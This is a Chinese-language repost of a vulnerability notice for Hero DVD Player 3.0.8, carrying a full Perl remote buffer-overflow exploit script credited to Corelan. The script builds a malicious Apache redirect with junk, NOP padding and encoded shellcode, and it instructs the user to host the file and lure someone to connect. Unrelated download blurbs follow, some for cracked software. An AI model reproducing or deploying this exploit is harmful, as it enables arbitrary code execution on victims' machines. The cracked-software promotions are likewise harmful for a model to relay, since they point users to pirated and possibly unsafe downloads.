豪杰DVD播放器是一款流行的多媒体播放器。
使用豪杰DVD播放器的用户受骗跟随了恶意Web服务器上的URL重新定向就可以触发栈溢出,导致执行任意代码
测试代码:
# Exploit Title : Hero DVD Remote Buffer Overflow Exploit
# Date : July 7, 2010
# Author : chap0 [www.seek-truth.net]
# Software Link : http://download.cnet.com/Hero-DVD-Player/3000-7970_4-10127412.html
# Version : 3.0.8
# OS : Windows XP SP3
# Greetz to : God the Creator, Sud0 (Thanks Bro for the Support)
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-056
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
print "|------------------------------------------------------------------|n";
print "| __ __ |n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n";
print "| |n";
print "| http://www.corelan.be:8800 |n";
print "| |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[*] Hero DVD Player Remote Exploit by chap0.n";
print "[*] Visit Corelan.be port 8800, Preparing Payload . . .n";
sleep(3);
my $file = "httpd.conf";
$code = "Redirect permanent /sploit http://";
$junk = "A" x 128;
$more = "yH2X" ; # alpha value for "yH2X" = 0x58324879 from msg723.acm
$nops = "x42" x 24; #Padding
#message box code
$shell = "TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIN9JKMK9IRTWTL401N2OB2ZVQXISTLKBQ6PLKRVDLLKT65LLKPF5XLKSNWPLKWFWH0OUHRUL3PYEQ8QKOKQSPLKRLGT7TLKQUGLLK645URX5QKZLKQZ28LKPZQ0EQZKKSVW79LKGDLKEQJNVQKOP1IPKLNLK4O03DUZO1HOTM5QYWKYJQKOKOKO7K3LVD18D59NLKPZVDS1JKU6LKTLPKLK1J5L5QZKLK34LKUQKXMYQTWT5L3QHCNRTHGYN4K9KUMYIRE8LNPNTNZLPRKXMLKOKOKOMYPE5TOKSNYHKRBSMW5L14QBKXLKKOKOKOMYQUS83XBLBLGPKOSX6SP2FNE4SXRUT33U3BLHQL14UZLIJFPVKO65TDLIO20POKOXORPMOLMWEL7TPRKX1NKOKOKO3XSBSUD7V8E8BLSQRNW3U8QSRO2RCUVQ9KMXQLWT4KMYM3U82TU8687PSXWPQDRRD5RH0SRESUBK6Q9YLHPL145ZLIM1VQN2F2PSV1PRKOHPP1O060KO0UUXTJA";
open(FILE,">$file");
print FILE $code.$junk.$more.$nops.$shell;
close(FILE);
print "[*] Use Backtrack! place httpd.conf in /etc/apache2/ and start apache.n";
print "[*] Have Someone Connect to your Server /sploit.n";
TAG标签: 漏洞
本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处,侵权必究!
原文链接:http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0710/1174.html
分享到:
相关推荐
VLC播放器 v3.0.8.dmg.zip 2020-02-17 更新的官方最新版 需要更新请留言 或者关注 https://99sos.info/
apache-groovy-3.0.8.zip apache官网的groovy3.0.8版本,希望大家多多下载,apache-groovy-3.0.8.zip apache官网的groovy3.0.8版本,希望大家多多下载,apache-groovy-3.0.8.zip apache官网的groovy3.0.8版本,希望...
非常强大的音视频播放器vlc 3.0.8 的源码.可以建立流媒体服务,音视频分转发等。分享给需要的朋友
LINUX内核源码,版本为3.0.8。送给有需要的朋友。tar.bz2格式。
NGUI Next-Gen UI 3.0.8 f7
RocketMQ-3.0.8-master 3.0.8 里面的秘密谁懂,有需要的拿去
赠送jar包:janino-3.0.8.jar; 赠送原API文档:janino-3.0.8-javadoc.jar; 赠送源代码:janino-3.0.8-sources.jar; 赠送Maven依赖信息文件:janino-3.0.8.pom; 包含翻译后的API文档:janino-3.0.8-javadoc-API...
赠送jar包:commons-compiler-3.0.8.jar; 赠送原API文档:commons-compiler-3.0.8-javadoc.jar; 赠送源代码:commons-compiler-3.0.8-sources.jar; 赠送Maven依赖信息文件:commons-compiler-3.0.8.pom; 包含...
sourcetree3.0.8 2018.11.20 最新版本 亲测可用,解决了之前的一些bug,欢迎下载使用
phpBB-3.0.8.zipphpBB-3.0.8.zipphpBB-3.0.8.zipphpBB-3.0.8.zipphpBB-3.0.8.zipphpBB-3.0.8.zipphpBB-3.0.8.zip
最新vlc sdk3.0.8 32位,包含头文件、lib。dll,存档分享一下
当前版本:3.0.8 (2009-12-08 02:05:07) 作者:GIDOT 邮箱:GIDOT@VIP.QQ.COM 网站:WWW.GIDOT.NET/TYPESETTER 官方QQ群:56288291、13733967 新增功能: ·关闭时保存编辑现场,包括当前排版助手中的文本以及光标...
1、双击[Fences_3.08_setup_sd.exe]安装Fences3.0.8 2、安装完成后,将[stardock.fences.3.0.5.x64-patch.exe]拷贝到fences安装目录下,以管理员身份运行补丁,点击patch按钮,弹出另存为对话框的时候,点击保存...
解锁VMware workstation 的MacOS选项
vlc 3.0.8 32位,开源免费的播放器,给有需要的人,亲测可用。
装系统专用,操作简单。nt6_hdd_installer_v3.0.8
资源分类:Python库 所属语言:Python 资源全名:Mezzanine-3.0.8.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
vlc-3.0.8-win64.exe vlc程序安装包用于播放音视频,也可以使用相关的库去开发属于自己的音视频播放器。
A Git GUI that offers a visual representation of your repositories. Sourcetree is a free Git client for Windows and Mac.
Fences,桌面栅格管理,好看好用,己破解,亲测可用。